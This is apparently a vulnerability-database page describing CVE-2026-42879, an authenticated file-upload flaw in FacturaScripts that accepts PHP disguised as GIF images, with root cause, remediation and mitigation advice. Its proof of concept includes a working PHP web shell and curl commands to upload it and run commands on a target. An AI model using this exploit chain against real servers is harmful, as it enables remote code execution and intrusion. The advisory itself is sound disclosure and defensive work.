Severity by source
AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L
Primary rating from GitHub Advisory · only source for this CVE.
CVSS VectorGitHub Advisory
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L
Lifecycle Timeline
3DescriptionGitHub Advisory
CVE-2026-42879 - FacturaScripts - Authenticated Unrestricted File Upload via MIME Type Bypass
Summary
An authenticated unrestricted file upload vulnerability exists in FacturaScripts' product image upload functionality. An attacker with valid credentials can upload a PHP file disguised as a GIF image (using a GIF89a header), bypassing MIME type validation. The file is stored with its original extension, including executable extensions such as .php.
---
Details
The vulnerability exists in:
Core/Lib/ExtendedController/ProductImagesTrait.php
Specifically in the addImageAction() method.
Vulnerable Code
if (false === strpos($uploadFile->getMimeType(), 'image/')) {
Tools::log()->error('file-not-supported');
continue;
}
$folder = Tools::folder('MyFiles');
Tools::folderCheckOrCreate($folder);
$uploadFile->move($folder, $uploadFile->getClientOriginalName());Root Cause
- The validation only checks if MIME type contains
"image/" - This can be bypassed by prepending GIF89a magic bytes to a PHP file
- The system incorrectly identifies the file as
image/gif - The file is saved with a
.phpextension in a web-accessible directory
File Storage Behavior
Uploaded files are stored in:
/MyFiles/YYYY/MM/X.phpWhere X is an auto-incrementing ID. This allows direct remote execution:
http://target/MyFiles/2026/03/2.php?cmd=id---
Impact
Successful exploitation:
An attacker may upload files with executable extensions (e.g. .php) to the server, which depending on server configuration could lead to further exploitation. ---
Proof of Concept (Manual)
Step 1: Create malicious file
cat > shell.jpg.php << 'EOF'
GIF89a
<?php
system($_GET['cmd']);
?>
EOFStep 2: Authenticate
- Login to the application
- Extract
PHPSESSIDfrom browser cookies
Step 3: Get CSRF token
curl -s "http://target/EditProducto?code=CONTA621" \
-H "Cookie: PHPSESSID=YOUR_SESSION_ID" \
| grep -o 'multireqtoken\" value=\"[^\"]*\"' | cut -d'"' -f4Step 4: Upload shell
curl -X POST "http://target/EditProducto?code=CONTA621" \
-H "Cookie: PHPSESSID=YOUR_SESSION_ID" \
-F "multireqtoken=YOUR_CSRF_TOKEN" \
-F "action=add-image" \
-F "activetab=EditProductoImagen" \
-F "idproducto=3" \
-F "newfiles[]=@shell.jpg.php"Step 5: Execute command
curl "http://target/MyFiles/2026/03/2.php?cmd=id"---
Affected Products
| Field | Value |
|---|---|
| Ecosystem | Packagist |
| CVE ID | CVE-2026-42879 |
| Package Name | facturascripts/facturascripts |
| Affected Versions | <= 2025.81 |
| Patched Versions | Not yet patched |
| Fixed in | Pending |
---
Remediation Recommendations
- Validate file extension - reject any upload where the filename ends in
.php,.phtml,.phar, or other executable extensions, regardless of MIME type - Re-generate filenames on the server - never use
getClientOriginalName(); assign a safe UUID-based name with a validated extension - Store uploads outside the webroot - serve files through a controller that streams content, preventing direct URL execution
- Use a file type library - validate actual file content (magic bytes + extension + MIME type) with a library like
fileinforather than trusting client-supplied MIME
Credits
- Discoverer: Abdullah Alwasabei / Guzrex
AnalysisAI
Remote code execution in FacturaScripts through authenticated file upload allows attackers with valid credentials to bypass MIME type validation by prepending GIF89a magic bytes to PHP files, resulting in executable files stored in a web-accessible directory. An attacker can upload a malicious PHP file disguised as a GIF image via the product image upload functionality, then directly execute arbitrary commands on the server. The vulnerability affects versions 2025.81 and earlier; publicly available proof-of-concept code exists demonstrating end-to-end exploitation.
Technical ContextAI
The vulnerability exists in FacturaScripts' product image upload functionality, specifically in Core/Lib/ExtendedController/ProductImagesTrait.php's addImageAction() method. The root cause is a weak MIME type validation that only checks whether the MIME type string contains 'image/', which is bypassable by prepending file magic bytes (GIF89a header) to arbitrary PHP code. The PHP interpreter will execute the file because the server stores uploads with their original client-supplied filename extensions in a web-accessible directory (/MyFiles/YYYY/MM/), and Apache/Nginx will serve and execute .php files by default. The system uses HTTP basic form upload without proper file content inspection (fileinfo extension) or filename sanitization, relying instead on client-controlled MIME type headers that can be manipulated by the browser or intercepted via proxy tools.
RemediationAI
No vendor-released patch is currently available. Immediate mitigations include: (1) Disable the product image upload feature entirely if not essential, blocking POST requests to /EditProducto with action=add-image; (2) Implement strict allowlist-based file extension validation that rejects .php, .phtml, .phar, .php3, .php4, .php5, .pht, and other executable extensions before any further processing, comparing against a hardcoded list rather than trusting MIME type; (3) Regenerate all uploaded filenames server-side using a UUID or hash-based identifier with only whitelisted extensions (.jpg, .png, .gif, .webp), discarding the client-supplied filename entirely; (4) Store uploaded files in a directory outside the web root (e.g., /var/uploads/ instead of /public/MyFiles/) and serve them through a PHP controller that validates access and streams content with appropriate Content-Disposition headers, preventing direct URL execution; (5) Use PHP's fileinfo extension or a dedicated library (e.g., finfo_file, getimagesize with strict validation) to verify actual file content (magic bytes) matches the claimed MIME type and intended extension, rejecting files with mismatches; (6) Restrict upload directory permissions to remove execute bit (chmod 644 or 755 on files, 755 on directories) and add a .htaccess file with 'php_flag engine off' in the MyFiles directory as a defense-in-depth layer. Monitor /MyFiles/ directory for recently created .php or .phtml files as an immediate detection control. Workaround limitation: these mitigations require code modification or server configuration changes; if FacturaScripts is managed as a third-party application, contact vendor for emergency patch availability.
sapi/cgi/cgi_main.c in PHP before 5.3.12 and 5.4.x before 5.4.2, when configured as a CGI script (aka php-cgi), does not
(1) boardData102.php, (2) boardData103.php, (3) boardDataJP.php, (4) boardDataNA.php, and (5) boardDataWW.php in Netgear
ProjectSend versions prior to r1720 are affected by an improper authentication vulnerability. Rated critical severity (C
Roundcube Webmail contains a critical PHP object deserialization vulnerability (CVE-2025-49113, CVSS 9.9) that allows au
Util/PHP/eval-stdin.php in PHPUnit before 4.8.28 and 5.x before 5.6.3 allows remote attackers to execute arbitrary PHP c
Palo Alto Networks PAN-OS management web interface contains an authentication bypass allowing unauthenticated attackers
Nagios XI version xi-5.7.5 is affected by OS command injection. Rated high severity (CVSS 8.8), this vulnerability is re
Nagios XI version xi-5.7.5 is affected by OS command injection. Rated high severity (CVSS 8.8), this vulnerability is re
The get_referers function in /opt/ws/bin/sblistpack in Sophos Web Appliance before 3.7.9.1 and 3.8 before 3.8.1.1 allows
The Backup Migration plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 1
NetAlertX (formerly PiAlert) versions 23.01.14 through 24.x before 24.10.12 allow unauthenticated command injection thro
The GiveWP - Donation Plugin and Fundraising Platform plugin for WordPress is vulnerable to PHP Object Injection in all
Same weakness CWE-94 – Code Injection
View allShare
External POC / Exploit Code
Leaving vuln.today
EUVD-2026-32626
GHSA-vf3q-frmr-vrr9